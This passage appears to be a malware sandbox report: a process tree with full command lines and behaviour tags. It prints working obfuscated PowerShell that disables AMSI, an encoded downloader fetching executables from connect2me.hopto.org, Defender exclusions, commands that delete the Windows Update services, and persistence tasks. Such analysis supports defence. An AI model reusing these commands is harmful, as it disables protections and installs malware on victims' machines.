)+''+'c'+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g,'+'N'+''+[Char](101)+''+'w'+''+[Char](83)+''+[Char](108)+'o'+[Char](116)+','+[Char](86)+''+'i'+''+'r'+''+[Char](116)+'u'+'a'+'l',$JcpufxBNFa,$WhXSvbiLldmgvP).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $yQkMsMFmeWN.CreateType();}$LmwyDvPDRmwTo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+'m.'+'d'+''+[Char](108)+'l')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'oft'+'.'+''+[Char](87)+'i'+'n'+''+'3'+''+'2'+''+'.'+''+[Char](85)+'n'+'s'+''+[Char](97)+''+[Char](102)+'eL'+[Char](109)+''+'w'+''+'y'+''+[Char](68)+''+[Char](118)+''+[Char](80)+''+[Char](68)+''+[Char](82)+'m'+[Char](119)+''+[Char](84)+''+'o'+'');$jfHSrvSwYckbyj=$LmwyDvPDRmwTo.GetMethod(''+[Char](106)+''+[Char](102)+''+[Char](72)+'S'+[Char](114)+''+'v'+'S'+'w'+''+'Y'+''+[Char](99)+''+[Char](107)+'by'+'j'+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+'bl'+'i'+''+'c'+''+','+''+[Char](83)+''+'t'+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TtXOZISESTAgtGLhVbe=OcEjBmjgkqZE @([String])([IntPtr]);$OPlYhYTDvkVwbwnYfLIpIh=OcEjBmjgkqZE @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EOqtELjGinv=$LmwyDvPDRmwTo.GetMethod('G'+[Char](101)+'t'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'eHa'+[Char](110)+'dl'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+''+'e'+'l'+[Char](51)+'2'+'.'+''+'d'+'l'+[Char](108)+'')));$SokzxZuWvUOqSr=$jfHSrvSwYckbyj.Invoke($Null,@([Object]$EOqtELjGinv,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+''+'i'+''+'b'+''+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$voNdPwZDqEgdXqoQH=$jfHSrvSwYckbyj.Invoke($Null,@([Object]$EOqtELjGinv,[Object](''+'V'+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+[Char](80)+'ro'+'t'+'e'+[Char](99)+''+[Char](116)+'')));$NciKAJs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SokzxZuWvUOqSr,$TtXOZISESTAgtGLhVbe).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+'i'+''+'.'+''+'d'+''+'l'+''+[Char](108)+'');$XEbaxMhIhaXiyJRRl=$jfHSrvSwYckbyj.Invoke($Null,@([Object]$NciKAJs,[Object](''+[Char](65)+'m'+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+''+'u'+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$GclceAqNtj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($voNdPwZDqEgdXqoQH,$OPlYhYTDvkVwbwnYfLIpIh).Invoke($XEbaxMhIhaXiyJRRl,[uint32]8,4,[ref]$GclceAqNtj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$XEbaxMhIhaXiyJRRl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($voNdPwZDqEgdXqoQH,$OPlYhYTDvkVwbwnYfLIpIh).Invoke($XEbaxMhIhaXiyJRRl,[uint32]8,0x20,[ref]$GclceAqNtj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](100)+'i'+[Char](97)+''+'l'+''+[Char](101)+''+[Char](114)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2164
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FlkHFSwuvhcy{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MTIDPedFieEzvx,[Parameter(Position=1)][Type]$HmudUNTBMo)$YIVhPyEkwTn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+'e'+''+[Char](99)+'t'+[Char](101)+''+'d'+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'','Cla'+[Char](115)+''+'s'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'ea'+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+'a'+''+'s'+'s,'+'A'+''+[Char](117)+''+'t'+'o'+[Char](67)+''+[Char](108)+'ass',[MulticastDelegate]);$YIVhPyEkwTn.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+'d'+''+[Char](101)+'By'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$MTIDPedFieEzvx).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+'n'+'a'+[Char](103)+''+[Char](101)+''+[Char](100)+'');$YIVhPyEkwTn.DefineMethod('I'+[Char](110)+''+'v'+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'eB'+'y'+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+''+'r'+'t'+'u'+''+'a'+'l',$HmudUNTBMo,$MTIDPedFieEzvx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'an'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $YIVhPyEkwTn.CreateType();}$bOljwQoVhKzJu=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+'t'+'e'+'m'+''+[Char](46)+''+[Char](100)+'l'+'l'+'')}).GetType('M'+'i'+''+'c'+''+'r'+'o'+[Char](115)+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+'2'+[Char](46)+''+[Char](85)+'ns'+'a'+''+[Char](102)+''+'e'+''+[Char](98)+'O'+[Char](108)+'j'+[Char](119)+'QoV'+'h'+'Kz'+[Char](74)+''+[Char](117)+'');$ulVLbmIRNnkqpL=$bOljwQoVhKzJu.GetMethod(''+'u'+''+[Char](108)+'V'+[Char](76)+''+[Char](98)+''+[Char](109)+''+'I'+''+[Char](82)+''+'N'+''+'n'+''+[Char](107)+''+[Char](113)+''+[Char](112)+''+[Char](76)+'',[Reflection.BindingFlags]''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c'+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$cGYxrKniMvCEgtFGiLN=FlkHFSwuvhcy @([String])([IntPtr]);$GneWzfSrFvDGmTrimjKMxY=FlkHFSwuvhcy @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$NKwFEpWsVKS=$bOljwQoVhKzJu.GetMethod('G'+'e'+'t'+[Char](77)+'o'+'d'+''+'u'+''+[Char](108)+'e'+'H'+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'')));$hsBMXpVMtYLgHI=$ulVLbmIRNnkqpL.Invoke($Null,@([Object]$NKwFEpWsVKS,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+''+'r'+''+'a'+''+[Char](114)+''+'y'+''+'A'+'')));$aNcRhhaZotHakvBxD=$ulVLbmIRNnkqpL.Invoke($Null,@([Object]$NKwFEpWsVKS,[Object](''+[Char](86)+'i'+'r'+'tu'+[Char](97)+''+'l'+''+[Char](80)+''+[Char](114)+''+'o'+'te'+'c'+'t')));$XIqFqCZ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hsBMXpVMtYLgHI,$cGYxrKniMvCEgtFGiLN).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+'l');$uKVnavRKeeDMiuZsi=$ulVLbmIRNnkqpL.Invoke($Null,@([Object]$XIqFqCZ,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'Sc'+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+'er')));$zecGtZcWUc=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aNcRhhaZotHakvBxD,$GneWzfSrFvDGmTrimjKMxY).Invoke($uKVnavRKeeDMiuZsi,[uint32]8,4,[ref]$zecGtZcWUc);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$uKVnavRKeeDMiuZsi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aNcRhhaZotHakvBxD,$GneWzfSrFvDGmTrimjKMxY).Invoke($uKVnavRKeeDMiuZsi,[uint32]8,0x20,[ref]$zecGtZcWUc);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](100)+''+[Char](105)+'a'+[Char](108)+''+'e'+''+'r'+''+[Char](115)+''+[Char](116)+''+'a'+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:740
- C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe
  2⤵
  - Executes dropped EXE
  PID:3596
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4552
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1192

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1208

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
1⤵
PID:1648

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2700

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3408

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4232
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4232 -s 832
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:4192

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4416

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
1⤵
PID:4356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:4540

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2372

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3740

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4764

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3832

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3244
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3244 -s 956
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:1708

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:2420

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3020
- C:\Users\Admin\AppData\Local\Temp\8aae493caafa6e42a5a7afe431aeac120ce4c152.exe
  "C:\Users\Admin\AppData\Local\Temp\8aae493caafa6e42a5a7afe431aeac120ce4c152.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2180
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3132
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4992
    - - C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
        5⤵
        Executes dropped EXE
        
        PID:3660
    - - C:\Users\Admin\AppData\Local\Temp\new2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\new2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:3960
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4288
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3960 -s 508
        6⤵
        Program crash
        
        PID:3644
    - - C:\Users\Admin\AppData\Local\Temp\SysApp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:4512
      - C:\Windows\SysWOW64\schtasks.exe
        
        /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:2400
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2668
    - - C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4980
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 244
    3⤵
    - Program crash
    PID:4924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2736
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4056
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:788
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1792
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3312
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:5008
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1296
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4968
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:1608
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:5100
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1856
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
